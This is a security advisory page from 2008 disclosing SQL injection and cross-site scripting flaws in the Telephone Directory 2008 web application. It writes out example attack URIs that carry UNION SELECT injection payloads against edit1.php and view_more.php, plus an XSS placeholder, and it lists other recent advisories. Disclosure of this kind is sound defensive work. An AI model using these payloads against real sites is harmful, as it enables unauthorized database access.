exploits , vulnerabilities , articles , Telephone Directory 2008 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities

Title	Telephone Directory 2008 Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
Published	2008-06-09-12:00AM
Updated	2008-06-09-12:00AM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	CWH Underground
Vulnerable	Rittwick Banerjee Telephone Directory 2008 Stable
Not Vulnerable
Code	An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice a victim to follow a malicious URI.The following example URIs are available:http://www.example.com/[path]/edit1.php?action=confirm_data&code=1'/**/UNION/**/SELECT/**/1,name,3,4,5,6,7,8,9,10,11,12/**/FROM/**/dept/**/WHERE/**/ID='HOUS001http://www.example.com/[path]/view_more.php?id=1'/**/UNION/**/SELECT/**/1,2,3,name,5/**/FROM/**/dept/**/WHERE/**/ID='INTX007812http://www.example.com/[path]/edit1.php?action=<XSS>
TXT

Vulnerabilities - newest 10 RSS | More

• 2008-09-06 Computer Associates Products Message Engine RPC Server Multiple Buffer Overflow Vulnerabilities
• 2008-09-05 NetBSD ICMPv6 MLD Packet Remote Denial of Service Vulnerability
• 2008-09-05 Drupal Content Creation Kit Module Multiple HTML Injection Vulnerabilities
• 2008-09-05 HP OpenView Select Identity Connectors Local Information Disclosure Vulnerability
• 2008-09-05 eZoneScripts Dating Website Remote File Upload Vulnerability
• 2008-09-05 MicroTik RouterOS SNMP Security Bypass Vulnerability
• 2008-09-04 Dnsmasq DCHP Lease Multiple Remote Denial Of Service Vulnerabilities
• 2008-09-04 Zen Cart Multiple SQL Injection Vulnerabilities
• 2008-09-04 NETGEAR WN802T Wireless Access Point EAPoL Key Length Denial of Service Vulnerability
• 2008-09-04 Atheros Communications AR5416-AC1E Information Element Denial of Service Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Sat, 06 Sep 2008 16:31:27 +0000